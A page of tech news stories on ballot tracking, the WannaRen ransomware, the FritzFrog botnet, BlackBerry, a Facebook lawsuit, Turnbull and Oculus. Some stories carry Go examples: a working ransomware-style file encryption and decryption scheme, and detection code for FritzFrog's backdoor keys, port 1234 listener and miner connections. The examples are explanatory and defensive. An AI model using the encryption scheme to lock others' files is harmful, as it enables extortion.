More stories


    With vote by mail under fire, election officials seek help from SaaS ballot tracking

    As election officials around the country race to ramp up mail-in voting ahead of this November’s general elections, they’re taking a number of steps to ensure their systems run efficiently and securely. Yet even in the best-run systems, there are occasional glitches. 
    In Denver County in 2010, for instance, a county official became alarmed when she received a notification that she should have received her ballot in the mail — but it never came. She reached out to Steve Olsen, whose software development firm worked with the city of Denver in 2009 to build a ballot-tracking system. 
    “We went with her to the USPS bulk mail processing center, and after a very informative tour and discussion, we were told a pallet of ballots had been pushed aside and forgotten for a few days,” Olsen told ZDNet. 
    The missing ballot was in that batch, waiting to be processed. The delay occurred well before election deadlines and ultimately didn’t really impact voters, Olsen said. Still, he argues, the incident underscored how their ballot-tracking application, which was in its pilot phase at the time, could give voters and election officials alike more confidence in mail-in voting. 
    “It did reveal the power of our system to provide visibility and accountability to all parties,” Olsen said. 
    Since then, Olsen’s firm has tracked ballots for more than 300 elections across the US with “no other incidents or concerns,” he said, nor has it had any security breaches. 
    Creating a sense of accountability may be one of the hardest parts of establishing a mail-in voting system this year, as President Trump seeks to undermine the process. 
    The state of Michigan, for instance, has been preparing for a deluge of mail-in ballots — mail-in voting for the general election is expected to be twice as high as previous records in the state, according to Michigan Secretary of State Jocelyn Benson.

    “We’re prepared, if not over-prepared,” Benson said during a recent online panel discussion. “I’m confident we’re doing everything humanly possible to ensure secure and safe elections in Michigan.” 
    That said, she added, “what we can’t control are narratives and misperceptions and disinformation that people with large bully pulpits… will utilize to sow seeds of doubt in the electorate about the sanctity of the process.”
    Even without political interference, setting up election infrastructure of any kind is no small task. 
    “No voting system is simple—there are particular processes and procedures specific to any method,” Paul Gronke, professor of political science at Reed College and director of the Early Voting Information Center, said in an email to ZDNet. “For example, under mail-in voting, you need procedures to process the volume of mail you are receiving, and in large jurisdictions, that involves specialized hardware, signature verification systems, etc.”
    Ballot tracking, he said, is “a useful tool for security, so citizens know when the ballots are sent and returned.”
    After working solely with the city of Denver for a few years, Olsen in 2012 spun out his software application into BallotTrax, a multi-tenant system open to different jurisdictions. The patent-pending BallotTrax is one of two ballot-tracking systems commonly used in the US, along with Ballot Scout, a web application developed by the nonprofit organization Democracy Works.

    A few years ago, Olsen moved BallotTrax to Amazon Web Services for a number of reasons, he said, including security and scalability. 
    Since the COVID-19 pandemic struck, Olsen said he’s been busy fielding calls from hundreds of counties across the US, as well as from state officials. BallotTrax currently has statewide contracts with Colorado and California, and it has pending contracts in a handful of other states. BallotTrax is also used at the county level in 10 other states across the US, and the firm is working with the National Vote at Home Institute to deploy ballot tracking services in new jurisdictions. 
    While BallotTrax’s customers are election administrators, voters are the initial end users of the system. To opt into ballot tracking, voters provide an app or web interface with their name and date of birth, and they pick their preferred method of communication — email, text or voice messaging. The system supports notifications in 14 different languages. 
    Election officials can customize the messages that are delivered via BallotTrax, but there are typically about seven different types of notifications that go out. The notifications begin when a ballot is printed and mailed, they can track the ballot through the postal stream, and they alert voters when their ballot is rejected or accepted by election officials. 
    BallotTrax relies on three different data streams. First, it consumes voter record data coming from the state, such as eligibility files and voter registration information. Next, the system uses data from the US Postal Service’s Intelligent Mail barcodes, which anyone can subscribe to in order to track pieces of mail. Lastly, BallotTrax uses data it receives from the printing vendor when a ballot is created. 
    The first category of data, collected from the state, is updated three or four times a day, Olsen said. BallotTrax moves that data over encrypted FTP sites; it is encrypted in transit and at rest and sits behind redundant firewalls, he said. The application’s code is tested every hour, and the company actively monitors for threats with a variety of industry-standard tools.
    The software complies with NIST SP 800-171, the standard for protecting controlled unclassified information on government contractors’ systems, and BallotTrax is a member of the Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC).
    “Security is a big deal,” Olsen said. “We’re only processing voter registration data which is kind of available in lots of places, but we recognize that voting and elections are of paramount importance to voters. We don’t sell their data, we don’t store their data afterwards — it’s consumed, messages are sent out, and then it’s deleted.”
    A number of the alleged concerns about fraud and tampering with mailed-in ballots can be mitigated with tracking, Olsen contends. For instance, the Trump administration and the GOP have raised objections in court to the practice of “ballot harvesting” — letting a third party pick up and submit your ballot for you. Along the same lines, Trump has railed against mail-in voting, claiming that “mail boxes will be robbed.”
    However, Olsen said, if a voter “mailed their ballot back but they never get a notification it’s been accepted, then they know something’s wrong, and they can alert the election office.” Or if a voter’s signature doesn’t match their signature on record, a quick BallotTrax notification “gives you some time to cure it.”
    “I don’t see how most of those arguments are valid if a state takes the time and effort to go through adding ballot tracking and transparency,” he said. 
    The system has additional benefits for election administrators. While voters must opt in to receive notifications, administrators can use a BallotTrax dashboard to track all mailed ballots within their jurisdiction. As the incident in Denver in 2010 illustrated, officials can use that visibility “to find out if there are issues in the postal stream that may become impactful later,” Olsen said. 
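    As an added illustration (not BallotTrax’s code; the feed field names and the stall thresholds are assumptions, and the events are constructed), the Go program below reconciles the three feeds described above into one status per ballot, emits the voter notifications in order, raises the “cure” notice after a signature rejection, and produces the administrator alert for a ballot that was handed to the postal service but never scanned again, the pattern behind the 2010 Denver pallet.

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// Ballot stages in order. Feeds are noisy (duplicate and out-of-order scans),
// so a ballot's status only ever advances to a later stage.
var stageRank = map[string]int{
	"printed": 1, "mailed_out": 2, "in_transit": 3, "mailed_back": 4,
	"received": 5, "accepted": 6, "rejected": 6,
}

// Event is one record from one of the three feeds. The field names are
// assumed; the page names the feeds but not their schemas.
type Event struct {
	BallotID string
	Source   string // "printer", "usps" or "office"
	Stage    string
	At       time.Time
}

// Status is what the voter notification and the administrator dashboard need.
type Status struct {
	Stage  string
	Since  time.Time
	Notify []string // voter-facing notifications, in the order they would be sent
	Alerts []string // administrator alerts about ballots that stopped moving
}

// How long a ballot may sit at a stage before the dashboard flags it.
// Constructed thresholds, not BallotTrax's.
var stall = map[string]time.Duration{
	"mailed_out":  5 * 24 * time.Hour, // handed to USPS but never scanned (the Denver pallet)
	"in_transit":  7 * 24 * time.Hour, // scanned outbound, never sent back
	"mailed_back": 7 * 24 * time.Hour, // return scan seen, office never logged receipt
	"received":    3 * 24 * time.Hour, // received, signature review not finished
}

// Reconcile merges the feeds into one status per ballot and derives the
// notifications and alerts from the stage transitions it observes.
func Reconcile(events []Event, now time.Time) map[string]*Status {
	sorted := append([]Event(nil), events...)
	sort.SliceStable(sorted, func(i, j int) bool { return sorted[i].At.Before(sorted[j].At) })
	out := map[string]*Status{}
	for _, e := range sorted {
		s := out[e.BallotID]
		if s == nil {
			s = &Status{}
			out[e.BallotID] = s
		}
		if stageRank[e.Stage] <= stageRank[s.Stage] {
			continue // duplicate, late or unknown stage: never regress
		}
		s.Stage, s.Since = e.Stage, e.At
		s.Notify = append(s.Notify, e.Stage+" ("+e.Source+")")
	}
	for id, s := range out {
		if s.Stage == "rejected" {
			s.Notify = append(s.Notify, "signature problem: contact the election office to cure")
		}
		if limit, ok := stall[s.Stage]; ok && now.Sub(s.Since) > limit {
			s.Alerts = append(s.Alerts, fmt.Sprintf("%s stalled at %s for %d days",
				id, s.Stage, int(now.Sub(s.Since).Hours()/24)))
		}
	}
	return out
}

// SampleEvents is a constructed feed: B1 completes normally, B2 was handed to
// USPS and never scanned again, B3 came back but failed signature review.
func SampleEvents(now time.Time) []Event {
	d := func(days int) time.Time { return now.Add(-time.Duration(days) * 24 * time.Hour) }
	return []Event{
		{"B1", "printer", "printed", d(20)}, {"B1", "printer", "mailed_out", d(19)},
		{"B1", "usps", "in_transit", d(18)}, {"B1", "usps", "in_transit", d(17)},
		{"B1", "usps", "mailed_back", d(8)}, {"B1", "office", "received", d(6)},
		{"B1", "office", "accepted", d(5)},
		{"B2", "printer", "printed", d(12)}, {"B2", "printer", "mailed_out", d(11)},
		{"B3", "printer", "printed", d(20)}, {"B3", "printer", "mailed_out", d(19)},
		{"B3", "usps", "mailed_back", d(9)}, {"B3", "office", "received", d(7)},
		{"B3", "office", "rejected", d(6)},
	}
}

func main() {
	now := time.Now()
	for id, s := range Reconcile(SampleEvents(now), now) {
		fmt.Printf("%s: %s notify=%v alerts=%v\n", id, s.Stage, s.Notify, s.Alerts)
	}
}
```

    The point of the rank table is that the postal and office feeds arrive independently and repeat themselves, so status is derived from the furthest stage seen rather than the latest record; the stall table is what turns the voter-facing “no notification yet” into something the dashboard surfaces before a deadline is at risk.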
    Election officials can also use the BallotTrax dashboard to gain insight into voter turnout and demographic trends. 
    Meanwhile, both voters and election officials benefit simply from a greater sense of confidence in the process, Olsen said. Back in Denver, before ballot tracking was deployed, election officials were receiving calls from around one out of every four voters inquiring about their mailed-in ballots, Olsen said. After tracking was implemented, only around one out of every 20 voters called in. 
    “We were answering voters’ concerns before they even asked,” Olsen said. 



    WannaRen ransomware author contacts security firm to share decryption key

    Image: QiAnXin

    A major ransomware outbreak hit Chinese internet users in April this year. For about a week, a ransomware strain known as WannaRen claimed tens of thousands of victims among home consumers and Chinese and Taiwanese companies alike.
    Four months later, WannaRen’s virality is easier to explain: its code was loosely modeled on WannaCry, the ransomware strain at the heart of the May 2017 global outbreak.
    Like their inspiration, the WannaRen authors built the EternalBlue exploit into their infection chain, letting WannaRen spread unchecked to any host in a corporate network still exposing unpatched SMBv1 before encrypting files and demanding a ransom.
    And just like WannaCry, WannaRen spread like wildfire, far beyond what its authors intended and creating more havoc than they anticipated, which is why, in the end, they gave up the master decryption key for free so that all victims could eventually recover their files.
    The Hidden Shadow malware group
    More than three years on, it is now established that WannaCry was created by North Korean government hackers as a way to infect a modest number of victims, ransom their files, and use the payments to raise funds for the Pyongyang regime. Its authors never had big ambitions; a global outbreak was never the intent, as it only drew more attention to their sanctions-evading criminal activity.
    Something similar can be said of the authors of WannaRen, a group that Chinese antivirus maker Qihoo 360 says it has been tracking under the name Hidden Shadow.
    Described as a small-time threat actor, this group has been active for years, being involved in the distribution of an assortment of malware strains, usually via pirated software download sites.
    Past operations involved the distribution of password-stealers, keyloggers, remote access trojans, and cryptocurrency-mining malware.
    WannaRen was added to the group’s arsenal and incorporated into their distribution routine on April 4, this year.
    According to multiple sources, WannaRen’s initial point of distribution was a modified installer for the Notepad++ text editor that was shared via the Xixi Software Center.

    Image via ITnews
    Because the official Notepad++ download site is often blocked in China, a consequence of the developer’s public statements critical of the Chinese government, and because Xixi is one of China’s largest software download sites, WannaRen infections spiked right away.
    Thousands of Chinese internet users began asking for help decrypting their files on Chinese forums, social networks, and online chats, starting with the first day when WannaRen infections started getting detected, according to local press.
    Hidden Shadow malware spread laterally across networks
    While many users were home consumers, many asking for help were IT admins managing corporate networks, where WannaRen was particularly aggressive.
    This was likely due to WannaRen’s infection routine.
    On computers where users installed this booby-trapped version of Notepad++, the installer dropped a backdoor trojan, deployed the EternalBlue exploit to spread laterally across a network (via SMBv1), and used a PowerShell script to download and install the WannaRen ransomware or a Monero-mining module.

    Image: Qihoo 360
    Once it had encrypted a system’s files, the ransomware displayed a ransom note featuring North Korean leader Kim Jong-un and demanded a decryption fee of 0.05 bitcoin (around $550 at the time of writing).
    Infected systems were easy to identify, since every encrypted file had the “.wannaren” extension appended to its name.

    Image via Weibo
    WannaRen authors give out their own decryption key
    Given the niche distribution method and the low ransom demand, it was clear from the start that the Hidden Shadow group had not intended for its ransomware to spread so widely and so fast.
    Likely fearing or anticipating a crackdown by Chinese authorities, less than a week after they began distributing WannaRen the group reached out to a local Chinese cybersecurity firm, Huorong Security (火绒, or Tinder Security).
    In a series of emails the company shared online, the WannaRen authors handed over the ransomware’s master private key (the “master decryption key” without which no decryptor can be built) and asked the company to create and distribute a free decryption utility to infected victims.
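    Why handing over a single private key unlocks every victim’s files: ransomware of this kind wraps a fresh per-file key with a master public key, so the victim’s machine never holds anything that can undo the wrapping, and only the master private key can recover the file keys. The Go program below is an added example of that scheme, not WannaRen’s code; the container layout and the choice of AES-GCM and RSA-OAEP are assumptions, since the page does not describe WannaRen’s file format. Demo() plays both roles, the locker on the victim and the vendor decryptor that receives the private key, and also shows that an unrelated private key is refused.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Locked is the assumed per-file container: the file key wrapped to the master
// public key, then the AES-GCM nonce, then the ciphertext. WannaRen's real
// on-disk layout is not described on the page; this is the textbook scheme.
type Locked struct {
	WrappedKey, Nonce, Ciphertext []byte
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Lock is the victim-side operation: a fresh 256-bit key per file, wrapped
// with RSA-OAEP. Only the master public key ever exists on the victim, so the
// machine holds nothing that can undo the wrapping.
func Lock(master *rsa.PublicKey, plaintext []byte) (*Locked, error) {
	fileKey := make([]byte, 32)
	if _, err := rand.Read(fileKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, master, fileKey, nil)
	if err != nil {
		return nil, err
	}
	return &Locked{wrapped, nonce, gcm.Seal(nil, nonce, plaintext, nil)}, nil
}

// Unlock is what a vendor decryptor does once the master private key has been
// handed over: unwrap the per-file key, then authenticate and decrypt the body.
func Unlock(master *rsa.PrivateKey, l *Locked) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, master, l.WrappedKey, nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap file key: %w", err)
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, l.Nonce, l.Ciphertext, nil)
}

// Demo locks a constructed document under one master key pair and reports
// whether the matching private key recovers it and an unrelated key is refused.
func Demo() (recovered, wrongKeyRefused bool, err error) {
	master, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return false, false, err
	}
	other, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return false, false, err
	}
	doc := []byte("constructed sample document, not a real victim file")
	locked, err := Lock(&master.PublicKey, doc)
	if err != nil {
		return false, false, err
	}
	got, err := Unlock(master, locked)
	recovered = err == nil && bytes.Equal(got, doc)
	_, err = Unlock(other, locked)
	wrongKeyRefused = err != nil
	return recovered, wrongKeyRefused, nil
}

func main() {
	recovered, refused, err := Demo()
	fmt.Println("recovered:", recovered, "wrong key refused:", refused, "error:", err)
}
```

    A decryptor built from the released key is therefore nothing more than Unlock() wrapped in a file walker: it needs the master private key and the per-file wrapped key that the ransomware itself left beside every ciphertext, and nothing from the attackers’ infrastructure.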

    Image: Huorong Security
    On the same day, on April 9, Huorong released its WannaRen decryption utility, followed a few hours later by a similar decryption utility created by RedDrip, a cyber-security division inside QiAnXin Technology, which has also been tracking the ransomware’s rapid spread across China.
    However, while the vast majority of WannaRen victims were in China, the ransomware’s extreme virality also let it spread through internal networks from Chinese subsidiaries into some foreign companies.
    Since not all of these companies may be aware that a free decryption tool exists, or may not trust tools from the two Chinese vendors, Romanian antivirus maker Bitdefender today released its own WannaRen decryption utility.
    At the time of writing, WannaRen infections appear to have died out, but victims who still hold copies of files encrypted by this threat in April can now decrypt them for free.


    Startup OnwardMobility hopes fourth time's a charm for BlackBerry

    In the beginning, there were BlackBerrys, email appliances that opened the world’s eyes to mobile data. Then came the second-generation BlackBerrys built on a new, short-lived operating system, BlackBerry 10. When the company exited the smartphone business and licensed the BlackBerry name to TCL, we saw the third-generation BlackBerrys built on Android. And next year we will see what may be the fourth generation of the pioneering mobile phone brand, courtesy of a startup called OnwardMobility that has replaced TCL as the BlackBerry brand licensee.

    How much of a break the new BlackBerrys make from the previous Android versions, particularly if TCL had been allowed to move forward, is yet unknown. OnwardMobility says that its first new BlackBerry, set to debut in the first half of 2021, will support 5G. Beyond that, it will have a physical keyboard, run on Android, and focus on security and privacy — all traits of products that TCL produced. Both traditional physical keyboards and newfangled folding screens, though, offer many ways to differentiate. (TCL seems keen on the latter, having shown off several, mostly non-functional, prototypes of devices with folding and even rolling displays last year.)
    The keyboard is the thornier issue. On TCL’s final BlackBerry, the Key2, the company boasted that its keys had been enlarged over its predecessor. While its keyboard is usable, even efficient with practice, it faces tough competition from large smartphones that offer adequate spacing for screen-based keyboards. The Surface Duo and the LG Velvet (when equipped with its second-screen accessory) can even dedicate a whole screen to the keyboard. As smartphone screens grew to better accommodate a thumb-typing experience, I once thought that, while the efficiency may be comparable between physical keys and glass typing, the former felt better with its tactile response. But by the time Android-based BlackBerrys arrived, the reverse felt true.
    Even if the next BlackBerry creates best-in-class smartphone keyboard efficacy (which today belongs to the Planet Computers products), it still must allocate room for the keyboard. That requires either reducing the screen size (as in the Key2) or making a two-decked device (as in the F(x)tec Pro1 or the Planet Computers’ Astro Slide, which is also due with 5G in the first half of next year). Some BlackBerry fans online have said they would welcome an updating of the Priv, a vertical slider with curved edge glass. Here’s where folding or rolling screens could come in handy, potentially creating minimal extra thickness while allowing access to a keyboard and larger display when extended.
    When the news of BlackBerry (the company) and TCL parting ways broke earlier this year, I speculated on many of the reasons why BlackBerry might have terminated the agreement. OnwardMobility says one of the things that appealed to the licensor was the new company’s ties to a well-regarded manufacturer. TCL may not have done enough to move the needle on BlackBerry volumes, but that’s been a long-running challenge that OnwardMobility will have to face as well. Retro smartphone brands have had a mixed record. Nokia-licensee HMD has effectively attacked the value segment, Lenovo’s Motorola brand is moving on from its modular Z-series experiment and initial RAZR revival, and startup Palm has stayed quiet since its initial mini-smartphone/companion landed with the thud of a basketball dribbled by backer Steph Curry.
    It’s now been almost four years since what was once Research in Motion left the smartphone market after its own long sales decline. 5G phones will be entering the market at a rapid clip next year. To make headway, OnwardMobility will have to extend the brand’s reach and signature input method to smartphone users who have known only typing on glass.


    Facebook sued over fact-check messages on anti-vaccination posts

    Facebook is being sued for displaying fact-check messages on anti-vaccination posts, with one group claiming that the practice is “censorship.”

    Children’s Health Defense (CHD), led by Robert F. Kennedy, Jr., filed the lawsuit on Monday in federal court in San Francisco. 
    In April, faced with an influx of misleading and fake COVID-19 content, the social media giant started notifying users when they had interacted with misinformation relating to the pandemic, whether through likes, reactions, or comments. 
    These posts included “cure-all” measures, fake methods to prevent contagion, and conspiracy theories, such as the connection between vaccinations, COVID-19, and 5G. 
    In recent months, conspiracy content spread by anti-vaccination groups including claimed connections between 5G and the spread of COVID-19, population microchipping schemes, and the creation of the novel coronavirus as a bioweapon. 
    Warnings included alerts and fact-check notices for misleading content and disproven claims, together with links to the Centers for Disease Control and Prevention (CDC) and World Health Organization (WHO) pages.
    Facebook, CEO Mark Zuckerberg, and three fact-checking companies hired by the firm to perform checks on hot topics — such as the novel coronavirus, 5G, and vaccines — are accused of “fraudulently misrepresenting and defaming CHD.”
    Alongside displaying alerts on CHD content, Facebook also removed the group’s donate button and rejected advertising bids.
    CHD says in its complaint (.PDF) that Facebook and the US government have teamed up to censor speech, and the company should not be protected as an alleged violator of the First Amendment — which usually does not apply to private companies — as the pair have “privatized” the law. 
    “The CDC and, under its aegis, the WHO then collaborated at length with Facebook to suppress vaccine safety speech with a “warning label” and other notices that appear to flag disinformation, but in reality censor valid and truthful speech,” the complaint reads.
    Furthermore, the group claims that Facebook has “insidious conflicts” with pharmaceutical companies, health regulators, and also has a vested interest in the telecom and 5G space. 
    CHD is seeking damages beyond $5 million.
    ZDNet has reached out to Facebook for comment and will update when we hear back. 



    New FritzFrog P2P botnet has breached at least 500 enterprise, government servers

    A newly discovered peer-to-peer (P2P) botnet has breached at least 500 government and enterprise SSH servers so far in 2020. 

    On Wednesday, cybersecurity firm Guardicore published research into FritzFrog, a peer-to-peer (P2P) botnet that has been detected by the company’s sensors since January this year. 
    According to researcher Ophir Harpaz, FritzFrog has attempted to brute-force SSH servers belonging to government, education, financial, medical, and telecom players worldwide over the last eight months. 
    The malware was discovered while Harpaz worked on the Botnet Encyclopedia, a free security threat tracker, as reported by sister site TechRepublic. 
    A minimum of 500 servers have been breached, including those connected to prominent US and European universities, as well as an unnamed railway company. 
    FritzFrog is a decentralized botnet that uses P2P protocols to distribute control over all of its nodes, thereby avoiding having one controller or point-of-failure. 
    The malware deployed after a successful SSH brute-force is fileless: it is assembled and executed only in memory, likely to avoid detection and leave little trace on disk. According to the team, each infected machine then becomes a bot capable of receiving and executing commands. 
    The FritzFrog malware is written in Golang, and over 20 variants have been detected in the wild. Once executed, FritzFrog unpacks its payload under the process names ifconfig and nginx and listens for commands on port 1234. 
    Because connections to a non-standard port like 1234 are easy to spot, the attackers instead connect to the victim over SSH and run a netcat client that relays commands to the local listener. 
    The first command joins the victim machine to the existing database of network peers and slave nodes. Other commands, all of them AES-encrypted, include adding a public SSH-RSA key to the authorized_keys file to establish a backdoor, running shell commands to monitor a victim’s resources and CPU usage, and network monitoring. 
    The malware portion of FritzFrog is also able to propagate over the SSH protocol. 
    FritzFrog’s primary goal is to mine for cryptocurrency. XMRig, a Monero miner, is deployed and connected to the public pool web.xmrpool.eu over port 5555.
    If processes on the server are hogging CPU resources, the malware may kill them to give the miner as much power as possible. 
    FritzFrog also exchanges and shares files by splitting them into binary blobs, keeping the blobs in memory, and indexing them in a map keyed by each blob’s hash.
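    The indicators above translate into two host checks, written here as an added Go example (not Guardicore’s tooling): an authorized_keys audit that fingerprints every entry the way `ssh-keygen -lf` does and flags keys missing from the administrators’ inventory, and a pass over `ss -tnp` output for a listener on 1234, a connection to port 5555, or a socket owned by a process calling itself ifconfig, which never holds one when it is the real tool. The key material, the inventory and the socket table are constructed, and the `ss` column layout is assumed to be the default.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// KeyFingerprint returns the OpenSSH SHA256 fingerprint of one authorized_keys
// entry, skipping leading options (from=, command=, ...) and the comment.
func KeyFingerprint(line string) (string, error) {
	f := strings.Fields(line)
	for i := 0; i+1 < len(f); i++ {
		if strings.HasPrefix(f[i], "ssh-") || strings.HasPrefix(f[i], "ecdsa-") {
			blob, err := base64.StdEncoding.DecodeString(f[i+1])
			if err != nil {
				return "", err
			}
			sum := sha256.Sum256(blob)
			return "SHA256:" + base64.RawStdEncoding.EncodeToString(sum[:]), nil
		}
	}
	return "", fmt.Errorf("no key material in %q", line)
}

// AuditAuthorizedKeys flags every entry of the file whose fingerprint is not in
// the administrators' inventory of keys they know they installed.
func AuditAuthorizedKeys(file string, inventory []string) []string {
	known := map[string]bool{}
	for _, l := range inventory {
		if fp, err := KeyFingerprint(l); err == nil {
			known[fp] = true
		}
	}
	var out []string
	for _, line := range strings.Split(file, "\n") {
		if line = strings.TrimSpace(line); line == "" || line[0] == '#' {
			continue
		}
		fp, err := KeyFingerprint(line)
		if err != nil {
			out = append(out, "authorized_keys: unparseable entry: "+err.Error())
		} else if !known[fp] {
			out = append(out, "authorized_keys: unknown key "+fp)
		}
	}
	return out
}

// sockLine matches `ss -tnp` columns: state, queues, local addr:port, peer addr:port, process.
var sockLine = regexp.MustCompile(`^(\S+)\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+:(\S+)\s+users:\(\("([^"]+)"`)

// AuditSockets checks the network indicators the page reports: a listener on
// 1234, a connection to port 5555, and a process called ifconfig owning a socket.
func AuditSockets(ss string) []string {
	var out []string
	for _, line := range strings.Split(ss, "\n") {
		m := sockLine.FindStringSubmatch(strings.TrimSpace(line))
		if m == nil {
			continue
		}
		state, local, peer, proc := m[1], m[2], m[3], m[4]
		if state == "LISTEN" && local == "1234" {
			out = append(out, "socket: "+proc+" listening on 1234")
		}
		if peer == "5555" || proc == "ifconfig" {
			out = append(out, "socket: "+proc+" connected to port "+peer)
		}
	}
	return out
}

// keyLine builds a syntactically valid entry from constructed key bytes (not a
// real key) so the sample file round-trips through the parser above.
func keyLine(typ, fill string, n int, comment string) string {
	var blob []byte
	for _, part := range []string{typ, strings.Repeat(fill, n)} {
		l := uint32(len(part))
		blob = append(blob, byte(l>>24), byte(l>>16), byte(l>>8), byte(l))
		blob = append(blob, part...)
	}
	return typ + " " + base64.StdEncoding.EncodeToString(blob) + " " + comment
}

// Constructed inputs: two legitimate keys plus one appended ssh-rsa backdoor, and
// `ss -tnp` output where 203.0.113.7 is a documentation address standing in for the pool.
var (
	adminKeys            = []string{keyLine("ssh-ed25519", "\x01", 32, "alice@admin-laptop"), `from="10.0.0.0/8",no-pty ` + keyLine("ssh-ed25519", "\x02", 32, "deploy@ci")}
	sampleAuthorizedKeys = strings.Join(append(adminKeys, keyLine("ssh-rsa", "A", 256, "")), "\n")
	sampleSockets        = `LISTEN 0  128  0.0.0.0:22      0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0  128  0.0.0.0:1234    0.0.0.0:*          users:(("nginx",pid=4242,fd=5))
ESTAB  0  0    10.0.0.5:48122  203.0.113.7:5555   users:(("ifconfig",pid=4250,fd=7))`
)

func main() {
	fmt.Println(AuditAuthorizedKeys(sampleAuthorizedKeys, adminKeys), AuditSockets(sampleSockets))
}
```

    Comparing fingerprints rather than raw lines matters because an appended key can carry any comment and any options it likes; the blob is the only part that cannot be disguised. On a real host, feed the check the contents of every user’s authorized_keys (root’s included) and the live `ss -tnp` output.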
    The P2P protocol used for communication by the botnet is “proprietary,” Guardicore notes, and is “not based on any existing implementation,” such as μTP.
    This may suggest that “the attackers are highly professional software developers,” the team says. While there are no concrete clues for attribution, some similarities have been found between FritzFrog and Rakos, a botnet discovered in 2016.



    Former PM Turnbull suggests Australia boosts its cyber capability by buying local

    Former Prime Minister Malcolm Turnbull
    Screenshot: Asha Barbaschow/ZDNet
    Former Prime Minister Malcolm Turnbull has said there’s an opportunity to boost Australian talent, if government and large businesses alike moved away from the big end of tech town when procuring services.
    “There’s clearly a big opportunity for innovation and we have outstanding cybersecurity professionals in Australia … we should be developing a world-leading cybersecurity industry,” Turnbull said on Wednesday. “The stronger your cybersecurity industry is in Australia, the better your cybersecurity will be.”
    He said one of Australia’s biggest weaknesses is a lack of confidence in its own technological skills and a failure on the part of government “despite encouragement from politicians like myself to invest in and with Australian companies”.
    “This is where governments I think often slip up — governments and big companies feel comfortable dealing with other big companies, often big systems integrators, foreign-owned. You’ve got to develop a culture where you are prepared to engage with, testbed, try out, do proof of concepts with smaller, younger, Australian companies,” he said.
    The country’s 29th Prime Minister spoke alongside Alastair MacGibbon, who prior to heading up his own Australian cybersecurity megamix, CyberCX, was Turnbull’s special advisor on cyber.
    Both Turnbull and MacGibbon in 2016 were faced with the failure of tech kit procured from IBM by the Australian Bureau of Statistics (ABS). On Census night, ABS experienced a series of small distributed denial-of-service (DDoS) attacks, suffered a hardware router failure, and baulked at a false-positive report of data being exfiltrated, which resulted in the Census website being shut down and citizens being unable to complete their online submissions.
    “That was a complete failure by IBM … whose face did all the egg end up on? It ended up on mine as the prime minister,” Turnbull said. “That was a classic case of an Australian agency … thinking that if they go with IBM, everything will be all right. You know, no one got fired for buying IBM and insert name of any other one of these big companies.”
    He said it speaks to not having enough technical skills inside government, and also “just being complacent about the big foreign companies”.
    “We need to have more confidence in our own capabilities,” he added.
    Acknowledging the need for more female representation in the cyber field, he also said anecdotally if the men in cybersecurity were more “congenial”, more women would get involved.
    “There is a theory, I honestly — I’m not warranting this — but there is a theory that if the men were more sort of congenial there’d be more women doing cyber subjects. I don’t know. I think it’s a commentary rather than the solution,” he said.
    Touching on the federal government’s newly released 2020 Cyber Security Strategy, and the level to which government should be involved with the cybersecurity of businesses, Turnbull said he was hesitant to get behind any legislative direction to govern board responsibilities.
    “One thing that could be useful is to require companies to formally address it in their annual report,” he said, accepting that such an approach is more of a “box ticking” exercise than a valid metric.
    “That is the problem, because with self-regulation, the only way to look at this is that you can’t — the government’s not in a position to do a security audit on every company in Australia. So the only thing you can do is keep talking about it and keep raising awareness of it.”
    “What would make a difference was if somebody got sued for not doing a good enough job on their cybersecurity … and companies need to be very careful about that because if you’re not paying attention to it and your customers incur, also your company incurs, a loss, you might find yourself at the wrong end of a shareholder action.”
    End-to-end encryption, Australia vs the US

    While the former PM covered 5G and the banning of Huawei, Chelsea Manning and Edward Snowden, and Australia’s relationship with the overseas-based monarchy, he also touched on the subtle differences between Australia and the United States where end-to-end encryption is concerned.
    “The arguments about end-to-end encryption are very cogent ones, because if you give, or if you say to WhatsApp or Signal or whatever, ‘you must have a backdoor key to allow lawful interception’, then the fact that that backdoor key exists, means that somebody else sees a vulnerability,” he said.
    “Therein lies the risk.”
    But further, Turnbull said the “cultural scene” where end-to-end encryption is concerned, differs in Australia to the likes of the US.
    “My sense is Australians generally think the government is trying to do the right thing … they sort of feel the government, by and large, has tried to do the right thing. You know, run by stumblebums and incompetence at any given time,” he said.
    “But in America, there is both on the right and the left, a really extreme libertarian tendency which sees the government as the enemy.”
    He said this culture manifests in Silicon Valley as a determination to maintain end-to-end encryption.
    “It’s quite ideological and baked into it today. It’s baked into their DNA and it’s connected with things like the second amendment and the right to bear arms,” Turnbull said. “It’s a very different mindset.”


    Facebook forcing Oculus users to have an account on its platform

    Oculus Quest
    Those wishing to use an Oculus device will soon be forced to have a Facebook account in order to log into their VR profile.
    From October, the Facebook-owned company will require users to log in via the social network and merge any existing Oculus account with a Facebook account. From January 2023, unmerged Oculus accounts will be shut down.
    Anyone using an Oculus device for the first time will need a Facebook account to proceed.
    “If you’re an existing user and choose not to merge your accounts, you can continue using your Oculus account for two years,” Oculus wrote in a blog post announcing the mandate.
    “If you choose not to merge your accounts at that time, you can continue using your device, but full functionality will require a Facebook account. We will take steps to allow you to keep using content you have purchased, though we expect some games and apps may no longer work.”
    Oculus said some games and apps may no longer work because they include features that require a Facebook account.
    “All future unreleased Oculus devices will require a Facebook account, even if you already have an Oculus account,” it continued.
    Oculus is touting the mandate as one making it easier to find, connect, and play with friends in VR.
